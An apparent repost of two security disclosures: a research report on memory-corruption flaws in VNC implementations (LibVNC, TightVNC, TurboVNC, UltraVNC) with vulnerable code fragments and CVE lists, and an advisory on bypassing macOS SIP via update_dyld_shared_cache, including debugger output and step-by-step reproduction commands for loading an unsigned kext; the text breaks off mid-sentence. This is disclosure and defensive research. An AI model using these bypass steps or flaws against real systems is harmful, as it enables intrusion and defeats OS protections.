  4. VNC vulnerability research Download PDF version 22 November 2019 Preparing for the research System description Possible attack vectors Objects of research Prior research Research findings LibVNC TightVNC TurboVNC UltraVNC CVE-2018-15361 CVE-2019-8262 Conclusion In this article, we discuss the findings of research which covered several different implementations of a remote access system called Virtual Network Computing (VNC). As a result of this research, we identified a number of memory corruption vulnerabilities, which have been assigned a total of 37 CVE identifiers. Some of the vulnerabilities identified, if exploited, could lead to remote code execution. Preparing for the research The VNC system is designed to provide one device with remote access to another device’s screen. It is worth noting that the protocol’s specification does not limit the choice of OS and allows cross-platform implementations. There are implementations both for common operating systems – GNU/Linux, Windows, Android – and for exotic ones. VNC has become one of the most widespread systems of its kind, thanks in part to cross-platform implementations and open-source licenses. The exact number of installations is hard to estimate. Based on data from shodan.io, over 600,000 VNC servers are available online. If you add those devices which are only available on the local network, it can be confidently assumed that the total number of VNC servers in use is many times (perhaps by orders of magnitude) greater. According to our data, VNC is actively used in industrial automation systems. We have recently published an article on the use of remote administration tools in industrial control systems on our website. It is estimated in the article that various remote administration tools (RAT), including VNC, are installed on about 32% of industrial control system computers. In 18.6% of all cases, RATs are included in ICS software distribution packages and are installed with that software. The remaining 81.4% were apparently installed by honest or not-so-honest employees of these enterprises or their contractors. In an article published on our website, we described attacks we had analyzed, in which the attackers had installed and used remote administration tools. Importantly, in some cases the attackers exploited vulnerabilities in remote administration tools as part of their attack scenarios. According to our estimates, most ICS vendors implement remote administration tools for their products based on VNC rather than any other system. This made an analysis of VNC security a high-priority task for us. In 2019, the BlueKeep vulnerability (CVE-2019-0708) in Windows RDP (Remote Desktop Services) triggered an emotional public response. The vulnerability enabled an unauthorized attacker to achieve remote code execution with SYSTEM privileges on a Windows machine on which the RDP server was running. It affected ‘junior’ versions of the operating system, such as Windows 7 SP1 and Windows 2008 Server SP1 and SP2. Some VNC server components in Windows are implemented as services that provide privileged access to the system, which means they themselves also have high-level access to the system. This is one more reason for prioritizing research on the security of VNC. System description VNC (Virtual Network Computing) is a system designed to provide remote access to the operating system’s user interface (desktop). VNC uses the RFB (remote frame buffer) protocol to transfer screen images, mouse movement and keypress events between devices. As a rule, each implementation of the system includes a server component and a client component. Since the RFB protocol is standardized, different implementations of the client and server parts are interchangeable. The server component sends the image of the server’s desktop to the client for viewing and the client in turn transmits client-side events (such as mouse cursor movements, keypresses, data copying and pasting via the cut buffer) back to the server. This enables the user on the client side to work on the remote machine where the VNC server is running. The VNC server sends an image every time the remote machine’s desktop is updated, which can occur, among other things, as a result of the client’s actions. Sending a new complete screenshot over the network is obviously a relatively resource-intensive operation, so instead of sending the entire screenshot the protocol updates those pixels which have changed as a result of some actions or events. RFB also supports several screen update compression and encoding methods. For example, compression can be performed using zlib or RLE (run-length encoding). Although the software is designed to perform a simple task, it has sufficiently extensive functionality for programmers to make mistakes at the development stage. Possible attack vectors Since the VNC system consists of server and client components, below we look at two main attack vectors: An attacker is on the same network with the VNC server and attacks it to gain the ability to execute code on the server with the server’s privileges. A user connects to an attacker’s ‘server’ using a VNC client and the attacker exploits vulnerabilities in the client to attack the user and execute code on the user’s machine. Attackers would without doubt prefer remote code execution on the server. However, most vulnerabilities are found in the system’s client component. In part, this is because the client component includes code designed to decode data sent by the server in all sorts of formats. It is while writing data decoding components that developers often make errors resulting in memory corruption vulnerabilities. The server part, on the other hand, can have a relatively small codebase, designed to send encoded screen updates to the user and handle events received from the client side. According to the specification, the server must support only six message types to provide all the functions required for its operation. This means that most server components have almost no complicated functionality, reducing the chances of a developer making an error. However, various extensions are implemented in some systems to augment the server’s functionality, such as file transfer, chat between the client and the server, and many others. As our research demonstrated, it is in the code designed to augment the server’s functionality that the majority of errors were made. Objects of research We selected the most common VNC implementations for our research: LibVNC – an open-source cross-platform library for creating a custom application based on the RFB protocol. The server component of LibVNC is used, for example, in VirtualBox to provide access to the virtual machine via VNC. UltraVNC – a popular open-source VNC implementation developed specifically for Windows. Recommended by many industrial automation companies for connecting to remote HMI interfaces over the RFB protocol (see, for example, here and here). TightVNCX – one more popular implementation of the RFB protocol. Recommended by many industrial automation system vendors for connecting to HMI interfaces from *nix machines. TurboVNC – an open-source VNC implementation. Uses the libjpeg-turbo library to compress JPEG images in order to accelerate image transfer. As part of our research, we did not analyze the security of a very popular product called RealVNC, because the product’s license does not allow reverse engineering. Prior research Before beginning to analyze VNC implementations, it is essential to do reconnaissance and see what vulnerabilities have already been identified in each of them. In 2014, the Google Security Team published a small LibVNC vulnerability analysis report. Since the project includes a very small amount of code, it could be assumed that Google engineers had identified all vulnerabilities existing in LibVNC. However, I was able to find several issues on GitHub (for example, this and this), which were created later than 2014. The number of vulnerabilities identified in the UltraVNC project is not large. Most of these vulnerabilities have to do with the exploitation of a simple stack overflow with arbitrary length data being written to a fixed-size buffer on the stack. All known vulnerabilities were found a relatively long time ago. Since then, project codebase has grown, while the older codebase was found to include old vulnerabilities. Research findings LibVNC After analyzing previously identified vulnerabilities, I fairly easily found variants of some of these vulnerabilities in the code of the extension providing file transfer functionality. The extension is not enabled by default: developers must explicitly allow it to be used in their LibVNC based projects. This is probably why these vulnerabilities had not been identified before. Next, I moved on from analyzing server code to researching the client part. It was there that I found vulnerabilities which had the most critical importance for the project and which were also quite diverse. Among the vulnerabilities identified, it is worth mentioning several classes of vulnerabilities that will also come up in other projects based on the RFB protocol. It can be said that each of these classes was made possible by the way the protocol’s specification is designed. More precisely, the protocol’s specification is designed in a way that does not guard developers against these classes of bugs, enabling such flaws to appear in the code. As an illustration of this point, you can look at the structures used in VNC projects to handle network messages. For example, open the rfbproto.h file, which has been used by generations of VNC project developers since 1999. The file is included in the LibVNC project, among others. An excellent example for demonstrating the first class of vulnerabilities is the rfbClientCutTextMsg structure, which is used to send information on cut buffer changes on the client to the server. 1 2 3 4 5 6 7 typedef struct { uint8_t type; /* always rfbClientCutText */ uint8_t pad1; uint16_t pad2; uint32_t length; /* followed by char text[length] */ } rfbClientCutTextMsg; After establishing a connection and performing an initial handshake, during which the client and the server agree to use specific screen settings, all messages transferred have the same format. Each message starts with one byte, which represents the message type. Depending on message type, a message handler and structure matching the type are selected. In different VNC clients, the structure is filled in more or less in the same way (pseudocode in C): 1 ReadFullData(socket, ((char *)&msg) + 1, sz_rfbServerSomeMessageType – 1); In this way, the entire message structure is filled in, with the exception of the first byte, which defines the message type. It can be seen that all fields in the structure are controlled by the remote user. It should also be noted that msg is a union, which consists of all possible message structures. Since the contents of the cut buffer has an unspecified length, memory will be allocated for it dynamically, using malloc . It should also be remembered that the cut buffer field should presumably contain text and it is customary to terminate text data with the zero character in the C language. Given all this, as well as the fact that the field length has the type uint32_t and is fully controlled by the remote user, in this case we have a typical integer overflow (pseudocode in C): 1 2 3 char *text = malloc(msg.length + 1); ReadFullData(socket, text, msg.length); text[msg.length] = 0; If an attacker sends a message length field with a value equal to UINT32_MAX = 232– 1 = 0xffffffff, the function malloc(0) will be called as a result of an integer overflow. If the standard glibc malloc memory allocation mechanism is used, the call will return a chunk of the smallest possible size – 16 bytes. At the same time, a length equal to UINT32_MAX will be passed to the ReadFullData function as an argument, which, in the case of LibVNC, will result in a heap-based buffer overflow. The second vulnerability type can be demonstrated on the same structure. As one can read in the specification or the RFC, some structures include padding for field alignment. However, from a security researcher’s viewpoint, this is just one more opportunity to discover a memory initialization error (see here and here). Let’s have a look at this typical error (pseudocode in C): 1 2 3 4 5 rfbClientCutTextMsg cct; cct.type = rfbClientCutText; cct.length = length; WriteToRFBServer(socket, &cct, sz_rfbClientCutTextMsg); WriteToRFBServer(socket, str, len); The message structure is created on the stack, after which some of its fields are filled in and the structure is sent to the server. It can be seen that the structures pad1 and pad2 remain empty. As a result of this, an uninitialized variable is sent over the network and an attacker can read uninitialized memory from the stack. If the attacker is in luck, the memory area that the attacker is able to access may contain the address of the heap, stack or text section, enabling the attacker to bypass ASLR and use overflow to achieve remote code execution on the client. Such trivial vulnerabilities have been found in VNC projects sufficiently often, which is why we decided to place them into separate classes. It is worth noting that analyzing such projects as LibVNC, which are positioned as cross-platform solutions, is not an easy task. While doing research on such projects, one should ignore anything that has to do with the specific OS and architecture of the researcher’s computer and view the project exclusively through the prism of the C language standard, otherwise it’s easy to miss some obvious flaws in code, which can only be reproduced on a specific platform. For example, in this case, the heap overflow vulnerability was incorrectly fixed on the 32 bit platform because the size or the size_t type on the x86_64 platform is different from the same type’s size on the 32 bit x86 platform. Information on all vulnerabilities identified was provided to developers and the vulnerabilities were closed (some even twice, thanks to Solar Designer for the help). TightVNC The next target for research was a fairly popular VNC client implementation for GNU/Linux. I was able to identify vulnerabilities in that system very quickly, because most were fairly straightforward and some were identical to those found in LibVNC. Two code fragments from two different projects are compared below. Originally, this vulnerability was identified in the LibVNC project, in the CoRRE decoding method (see code on the right-hand side). In the above code fragment, data of arbitrary length is read to a fixed-length buffer inside the rfbClient structure. This naturally results in buffer overflow. By a curious coincidence, function pointers are located inside the structure, almost right after the cut buffer, which almost immediately results in code execution. It can be observed that, with the exception of some minor variations, the code fragments from LibVNC and TightVNC can be considered identical. Both fragments were copied from the AT&T Laboratories. The developers introduced this vulnerability back in 1999. (I was able to determine this through the AT&T Laboratories license, in which developers usually specify who was involved in the development project during different time periods.) That code has been modified several times since then – for example, in LibVNC the static global buffer was moved to the client’s structure – but the vulnerability survived all the modifications. It is also worth noting that HandleCoRREBPP is a rather original name. If you search the code of projects on GitHub for this character combination, you can find lots of VNC-related projects that thoughtlessly copied the vulnerable decoding function carrying this name or the entire LibVNC library. This is why these projects may remain vulnerable forever – unless the developers update the contents of their projects or fix the vulnerability in the code themselves. The character combination HandleCoRREBPP is in fact not a function name. BPP in this case stands for “Bits per Pixel” and is a number equal to 8, 16 or 32, depending on the color depth agreed on by the client and the server at the initialization stage. It is assumed that developers will use this file as an auxiliary file in their macros as follows: 1 2 3 4 5 #ifndef HandleCoRRE8 #define BPP 32 #include ”corre.h” #undef BPP #endif The result is several functions: HandleCoRRE8, HandleCoRRE16 and HandleCoRRE32. Since the program was originally written in C rather than C++, the developers had to come up with such tricks because there were no templates available. However, if you google the function name HandleCoRRE or HandleCoRRE32, you may discover that there are projects which were slightly modified, either using or not using patterns, but which still contain the vulnerability. Unfortunately, there are hundreds of projects in which this code was included without any changes or copied and it is not always possible to contact their developers. The sad story of TightVNC does not end here. When we reported the vulnerabilities to TightVNC developers, they thanked us for the information and let us know that they had discontinued the development of the TightVNC 1.X line and no longer fixed any vulnerabilities found, because it had become uneconomical for their company. At some point, GlavSoft began to develop a new line, TightVNC 2.X, which does not include any GPL-licensed third-party code and which can therefore be developed as a commercial product. It should be noted that TightVNC 2.X for Unix systems is distributed only under commercial licenses and should not be expected to be released as open source software. We reported the vulnerabilities identified in TightVNC oss-security and emphasized that package maintainers needed to fix these vulnerabilities by themselves. Although we sent our notification to package maintainers in January 2019, the vulnerabilities had not been fixed at the time of this article’s publication (November 2019). TurboVNC This VNC project deserves a special ‘prize’: the one vulnerability identified in it is mind-boggling. Consider a C code fragment taken from the main server function designed to handle user messages: 1 2 3 4 5 6 7 8 9 char data[64]; READ(((char *)&msg) + 1, sz_rfbFenceMsg – 1) READ(data, msg.f.length) if (msg.f.length > sizeof(data)) rfbLog("Ignoring fence. Payload of %d bytes is too large.\n", msg.f.length); else HandleFence(cl, flags, msg.f.length, data); return; This code fragment reads a message in the rfbFenceType format. The message provides the server with information on the length msg.f.length of type uint8_t user data, which follows the message. This is obviously the case of arbitrary user data being read into a fixed-size buffer, resulting in stack overflow. Importantly, a check of the length of the data read is performed after the data has been read into the buffer. Due to the absence of overflow protection on the stack (a so-called canary), this vulnerability makes it possible to control return addresses and, consequently, to achieve remote code execution on the server. An attacker would, however, first need to obtain authentication credentials to connect to the VNC server or gain control of the client before the connection is established. UltraVNC In UltraVNC, I was able to identify multiple vulnerabilities in both the server and the client components of the project, to which 22 CVE IDs were assigned. A distinguishing feature of this project is its focus on Windows systems. When analyzing projects that can be compiled for GNU/Linux, I prefer to take two different approaches to vulnerability search. First, I analyze the code, looking for vulnerabilities in it. Second, I try to figure out how the search for vulnerabilities in the project can be automated using fuzzing. This is what I did when analyzing LibVNC, TurboVNC, and TightVNC. For such projects, it is very easy to write a wrapper for libfuzzer, since the project does not depend on a specific operating system’s implementation of the network API – there is an additional abstraction layer implemented for that. To write a good fuzzer, all you have to do is implement the target function on your own, as well as rewrite the networking functions. This will allow data from the fuzzer to be fed to the program – as if it was transferred over the network. However, in the case of analyzing projects for Windows, the latter technique is difficult to use even with open-source projects because the relevant tools are either not available or poorly developed. At the time of the analysis, libfuzzer for Windows had not yet been released. In addition, the event-oriented approach used in Windows application development means that a very large amount of code would have to be rewritten to achieve good fuzzing coverage. Because of this, I used only manual code analysis when analyzing UltraVNC for vulnerabilities. As a result of this analysis, I found an entire ‘zoo’ of vulnerabilities in UltraVNC – from trivial buffer overflows in strcpy and sprintf to more or less curious vulnerabilities that can rarely be encountered in real-world projects. Below we discuss some of these vulnerabilities. CVE-2018-15361 This vulnerability exists in UltraVNC client-side code. At the initialization stage, the server should provide information on display height and width, color depth, palette and name of the desktop, which can be displayed, for example, in the title bar of the window. The name of the desktop is a string of an undefined length. Consequently, the string’s length is sent to the client first, followed by the string itself. The relevant fragment of code is shown below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 void ClientConnection::ReadServerInit() { ReadExact((char *)&m_si, sz_rfbServerInitMsg); m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth); m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight); m_si.format.redMax = Swap16IfLE(m_si.format.redMax); m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax); m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax); m_si.nameLength = Swap32IfLE(m_si.nameLength); m_desktopName = new TCHAR[m_si.nameLength + 4 + 256]; m_desktopName_viewonly = new TCHAR[m_si.nameLength + 4 + 256+16]; ReadString(m_desktopName, m_si.nameLength); . . . } The attentive reader will make the correct observation that the above code contains an integer overflow vulnerability. However, in this case the vulnerability leads not to heap-based buffer overflow in the ReadString function but to more curious consequences. 1 2 3 4 5 6 void ClientConnection::ReadString(char *buf, int length) { if (length > 0) ReadExact(buf, length); buf[length] = '\0'; } It can be seen that the ReadString function is designed to read a string of the length length and terminate it with a zero. It is worth noting that the function takes the signed type as its second argument. If we specify a very large number in m_si.nameLength, it will be treated as a negative number when passed to the ReadString function as an argument. This will result in length failing the positivity check and the buf array remaining unitialized. Only one thing that will happen: a null byte will be written at offset buf + length. Given that length is a negative number, this makes it possible to write the null byte at a fixed negative offset relative to buf. The upshot of this is that if an integer overflow occurs when allocating m_desktopName and the buffer is allocated on the regular heap of the process, this will make it possible to write the null byte to the previous chunk. If an integer overflow does not occur and the system has sufficient memory, a large buffer will be allocated, with a new heap allocated for it. With the right parameters, a remote attacker would be able to write a null byte to the _NT_HEAP structure, which will be located directly before a huge chunk. This vulnerability is guaranteed to cause a DoS, but the question of the ability to achieve remote code execution remains open. I wouldn’t rule out that experts in exploiting the Windows userland heap could turn this vulnerability into an RCE if they wanted to. CVE-2019-8262 The vulnerability was identified in the handler of data encoded using the Ultra encoding. It demonstrates that the security and availability of this functionality really hung by a very thin thread. The handler uses the lzo1x_decompress function from the minilzo library. To understand what the vulnerability is, one has to look at the prototypes of compression and decompression functions. To call the decompression function, one has to pass the buffer containing compressed data, compressed data length, the buffer to which the data should be unpacked and its length as inputs. It should be kept in mind that the function may return an error if the input data cannot be decompressed. In addition, the developer needs to know the exact length of the data that will be unpacked to the output buffer. This means that, in addition to the error code, the function should return a value equal to the number of bytes written. For example, the argument that is used to pass the write buffer length can be used for this, provided that it is passed by pointer. In that case the minimum interface of the decompression function will look as follows: 1 int decompress(const unsigned char *in, size_t in_len, unsigned char *out, size_t *out_len) The first four parameters of this function are the same as the first four parameters of the lzo1x_decompress function. Now consider the fragment of UltraVNC code that contains the critical heap overflow vulnerability. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 void ClientConnection::ReadUltraRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; UINT numRawBytes = numpixels * m_minPixelBytes; UINT numCompBytes; lzo_uint new_len; rfbZlibHeader hdr; // Read in the rfbZlibHeader omni_mutex_lock l(m_bitmapdcMutex); ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); CheckBufferSize(numCompBytes); ReadExact(m_netbuf, numCompBytes); CheckZlibBufferSize(numRawBytes); lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL); . . . } As you can see, UltraVNC developers do not check the lzo1x_decompress return code, which is, however, insignificant compared to another flaw – the improper use of new_len. The uninitialized variable new_len is passed to the lzo1x_decompress function. At the time of calling the function, the variable should be equal to the length of the m_zlibbuf buffer. In addition, while debugging vncviewer.exe (the executable file was taken from a build on the UltraVNC official website), I was able to find out why this code had passed the testing stage. It turned out that the problem was that, since the variable new_len was not initialized, it contained a large text section address value. This made it possible for a remote user to pass specially crafted data to the decompression function as inputs to ensure that the function, when writing to the m_zlibbuf buffer, would write the data beyond the buffer’s boundary, resulting in heap overflow. Conclusion In conclusion, I would like to mention that while doing the research I often couldn’t help thinking that the vulnerabilities I found were too unsophisticated to have been missed by everyone before. However, it was true. Each of these vulnerabilities had a very long lifetime. Some of the vulnerability classes identified in the study are present in a large number of open-source projects, surviving even codebase refactoring. I believe it is very important to be able to systematically identify such sets of vulnerable projects containing vulnerabilities that are not always inherited in clear ways. Almost none of the projects analyzed are unit tested; programs are not systematically tested for security using static code analysis or fuzzing. Magic constants that are abundant in code make it similar to a house of cards: just one constant changed in this unstable structure could result in a new vulnerability. Here are our recommendations for developers and vendors that use third-party VNC project code in their products: Set up a bug tracking mechanism in all third-party VNC projects used and regularly update their code to the latest release. Add compilation options that make it harder for attackers to exploit any vulnerabilities that may exist in the code. Even if researchers are not able to identify all the vulnerabilities in a project, exploiting them should be made as difficult as possible. For example, some of the vulnerabilities described in this article would be impossible to exploit to achieve remote code execution if the project was compiled as a position-independent executable (PIE). In that case, the vulnerabilities would remain, but their exploitation would lead to denial of service (DoS) rather than RCE. Another example is the unfortunate experience with TurboVNC: the compiler can sometimes optimize the procedure of checking the stack canary. Some compilers perform such optimizations by removing stack canary checks from the functions that don’t have explicitly allocated arrays. However, the compiler could make a mistake and fail to check for the presence of a buffer in some of the structures on the stack or in switch-case statements (which is what probably happened in the case of TurboVNC). To make it impossible to exploit a vulnerability that has been identified, the compiler should be explicitly told that the stack canary checking procedure should not be optimized. Perform fuzzing and testing of the project on all architectures for which the project is made available. Some vulnerabilities may manifest themselves only on one of the platforms due to its specific features. Be sure to use sanitizers in the process of fuzzing and at the testing stage. For example, a memory sanitizer is guaranteed to identify such vulnerabilities as the use if uninitialized values. On the positive side, password authentication is often required to exploit server-side vulnerabilities, and the server may not allow users to configure a password-free authentication method for security reasons. This is the case, for example, with UltraVNC. As a safeguard against attacks, clients should not connect to unknown VNC servers and administrators should configure authentication on the server using a unique strong password. The following vulnerabilities were registered based on this research: LibVNC CVE-2018-6307 CVE-2018-15126 CVE-2018-15127 CVE-2018-20019 CVE-2018-20020 CVE-2018-20021 CVE-2018-20022 CVE-2018-20023 CVE-2018-20024 CVE-2019-15681 TightVNC CVE-2019-8287 CVE-2019-15678 CVE-2019-15679 CVE-2019-15680 TurboVNC CVE-2019-15683 UltraVNC CVE-2018-15361 CVE-2019-8258 CVE-2019-8259 CVE-2019-8260 CVE-2019-8261 CVE-2019-8262 CVE-2019-8263 CVE-2019-8264 CVE-2019-8265 CVE-2019-8266 CVE-2019-8267 CVE-2019-8268 CVE-2019-8269 CVE-2019-8270 CVE-2019-8271 CVE-2019-8272 CVE-2019-8273 CVE-2019-8274 CVE-2019-8275 CVE-2019-8276 CVE-2019-8277 CVE-2019-8280 To be continued… Download PDF version Pavel Cheremushkin Security Researcher, KL ICS CERT Sursa: https://ics-cert.kaspersky.com/reports/2019/11/22/vnc-vulnerability-research/
  5. Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g). On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally on the system and therefore doesn't have a real code signature; instead, SIP seems to be the only mechanism that prevents modifications of the dyld shared cache. update_dyld_shared_cache, the tool responsible for generating the shared cache, is able to write to /private/var/db/dyld/ because it has the com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache is responsible for ensuring that it only writes data from trustworthy libraries when updating the shared cache. update_dyld_shared_cache accepts two interesting command-line arguments that make it difficult to enforce these security properties: - "-root": Causes libraries to be read from, and the cache to be written to, a caller-specified filesystem location. - "-overlay": Causes libraries to be read from a caller-specified filesystem location before falling back to normal system directories. There are some checks related to this, but they don't look very effective. main() tries to see whether the target directory is protected by SIP: bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir); If that variable is true, update_dyld_shared_cache attempts to ensure that all source libraries are also protected by SIP. isProtectedBySIP() is implemented as follows: bool isProtectedBySIP(const std::string& path) { if ( !sipIsEnabled() ) return false; return (rootless_check_trusted(path.c_str()) == 0); } Ignoring that this looks like a typical symlink race issue, there's another problem: Looking in a debugger (with SIP configured so that only debugging restrictions and dtrace restrictions are disabled), it seems like rootless_check_trusted() doesn't work as expected: bash-3.2# lldb /usr/bin/update_dyld_shared_cache [...] (lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&) Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4 [...] (lldb) run -force Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64) Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) update_dyld_shared_cache`isProtectedBySIP: -> 0x1000433a4 <+0>: pushq %rbp 0x1000433a5 <+1>: movq %rsp, %rbp 0x1000433a8 <+4>: pushq %rbx 0x1000433a9 <+5>: pushq %rax Target 0: (update_dyld_shared_cache) stopped. (lldb) breakpoint set --name rootless_check_trusted Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea (lldb) continue Process 457 resuming Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1 frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted libsystem_sandbox.dylib`rootless_check_trusted: -> 0x7fff5f32b8ea <+0>: pushq %rbp 0x7fff5f32b8eb <+1>: movq %rsp, %rbp 0x7fff5f32b8ee <+4>: movl $0xffffffff, %esi ; imm = 0xFFFFFFFF 0x7fff5f32b8f3 <+9>: xorl %edx, %edx Target 0: (update_dyld_shared_cache) stopped. (lldb) print (char*)$rdi (char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/" (lldb) finish Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = step out frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54 update_dyld_shared_cache`isProtectedBySIP: -> 0x1000433da <+54>: testl %eax, %eax 0x1000433dc <+56>: sete %al 0x1000433df <+59>: addq $0x8, %rsp 0x1000433e3 <+63>: popq %rbx Target 0: (update_dyld_shared_cache) stopped. (lldb) print $rax (unsigned long) $1 = 1 Looking around with a little helper (under the assumption that it doesn't behave differently because it doesn't have the entitlement), it looks like only a small part of the SIP-protected directories show up as protected when you check with rootless_check_trusted(): bash-3.2# cat rootless_test.c #include <stdio.h> int rootless_check_trusted(char *); int main(int argc, char **argv) { int res = rootless_check_trusted(argv[1]); printf("rootless status for '%s': %d (%s)\n", argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE"); } bash-3.2# ./rootless_test / rootless status for '/': 1 (MALLEABLE) bash-3.2# ./rootless_test /System rootless status for '/System': 0 (PROTECTED) bash-3.2# ./rootless_test /System/ rootless status for '/System/': 0 (PROTECTED) bash-3.2# ./rootless_test /System/Library rootless status for '/System/Library': 0 (PROTECTED) bash-3.2# ./rootless_test /System/Library/Assets rootless status for '/System/Library/Assets': 1 (MALLEABLE) bash-3.2# ./rootless_test /System/Library/Caches rootless status for '/System/Library/Caches': 1 (MALLEABLE) bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE) bash-3.2# ./rootless_test /usr rootless status for '/usr': 0 (PROTECTED) bash-3.2# ./rootless_test /usr/local rootless status for '/usr/local': 1 (MALLEABLE) bash-3.2# ./rootless_test /private rootless status for '/private': 1 (MALLEABLE) bash-3.2# ./rootless_test /private/var/db rootless status for '/private/var/db': 1 (MALLEABLE) bash-3.2# ./rootless_test /private/var/db/dyld/ rootless status for '/private/var/db/dyld/': 1 (MALLEABLE) bash-3.2# ./rootless_test /sbin rootless status for '/sbin': 0 (PROTECTED) bash-3.2# ./rootless_test /Applications/Mail.app/ rootless status for '/Applications/Mail.app/': 0 (PROTECTED) bash-3.2# Perhaps rootless_check_trusted() limits its trust to paths that are writable exclusively using installer entitlements like com.apple.rootless.install, or something like that? That's the impression I get when testing different entries from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted specific entitlement show up as protected, the ones with a whitelisted specific entitlement show up as malleable. rootless_check_trusted() checks for the "file-write-data" permission through the MAC syscall, but I haven't looked in detail at how the policy actually looks. (By the way, looking at update_dyld_shared_cache, I'm not sure whether it would actually work if the requireDylibsBeRootlessProtected flag is true - it looks like addIfMachO() would never add any libraries to dylibsForCache because `sipProtected` is fixed to `false` and the call to isProtectedBySIP() is commented out?) In theory, this means it's possible to inject a modified version of a library into the dyld cache using either the -root or the -overlay flag of update_dyld_shared_cache, reboot, and then run an entitled binary that will use the modified library. However, there are (non-security) checks that make this annoying: - When loading libraries, loadPhase5load() checks whether the st_ino and st_mtime of the on-disk library match the ones embedded in the dyld cache at build time. - Recently, dyld started ensuring that the libraries are all on the "boot volume" (the path specified with "-root", or "/" if no root was specified). The inode number check means that it isn't possible to just create a malicious copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to use the malicious copy; the modified library will have a different inode number. I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even that is possible; inode numbers are monotonically incrementing 64-bit integers. Since root (and even normal users) can mount filesystem images, I decided to create a new filesystem with appropriate inode numbers. I think HFS probably can't represent the full range of inode numbers that APFS can have (and that seem to show up on volumes that have been converted from HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I decided to go with an APFS image. Writing code to craft an entire APFS filesystem would probably take quite some time, and the public open-source APFS implementations seem to be read-only, so I'm first assembling a filesystem image normally (create filesystem with newfs_apfs, mount it, copy files in, unmount), then renumbering the inodes. By storing files in the right order, I don't even need to worry about allocating and deallocating space in tree nodes and such - all replacements can be performed in-place. My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so that it always returns zero, which causes the userspace kext loading code to ignore code signing errors. To reproduce: - Ensure that SIP is on. - Ensure that you have at least something like 8GiB of free disk space. - Unpack the attached dyld_sip.tar (as normal user). - Run ./collect.sh (as normal user). This should take a couple minutes, with more or less continuous status updates. At the end, it should say "READY" after mounting an image to /private/tmp/L. (If something goes wrong here and you want to re-run the script, make sure to detach the volume if the script left it attached - check "hdiutil info".) - As root, run "update_dyld_shared_cache -force -root /tmp/L". - Reboot the machine. - Build an (unsigned) kext from source. I have attached source code for a sample kext as testkext.tar - you can unpack it and use xcodebuild -, but that's just a simple "hello world" kext, you could also use anything else. - As root, copy the kext to /tmp/. - As root, run "kextutil /tmp/[...].kext". You should see something like this: bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" } Code Signing Failure: code signature is invalid Disabling KextAudit: SIP is off Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" } bash-3.2# dmesg|tail -n1 test kext loaded bash-3.2# kextstat | grep test 120 0 0xffffff7f82a50000 0x2000 0x2000 net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5> bash-3.2# Miscellaneous notes: - It looks like there's an OOB kernel write in the dyld shared cache pager; but AFAICS that isn't reachable unless you've already defeated SIP, so I don't think it's a vulnerability: vm_shared_region_slide_page_v3() is used when a page from the dyld cache is being paged in. It essentially traverses a singly-linked list of relocations inside the page; the offset of the first relocation (iow the offset of the list head) is stored permanently in kernel memory when the shared cache is initialized. As far as I can tell, this function is missing bounds checks; if either the starting offset or the offset stored in the page being paged in points outside the page, a relocation entry will be read from OOB memory, and a relocated address will conditionally be written back to the same address. - There is a check `rootPath != "/"` in update_dyld_shared_cache; but further up is this: // canonicalize rootPath if ( !rootPath.empty() ) { char resolvedPath[PATH_MAX]; if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) { rootPath = resolvedPath; } // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty if ( rootPath == "/" ) { rootPath = ""; } } So as far as I can tell, that condition is always true, which means that when an overlay path is specified with `-overlay`, the cache is written to the root even though the code looks as if the cache is intended to be written to the overlay. - Some small notes regarding the APFS documentation at <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>: - The typedef for apfs_superblock_t is missing. - The 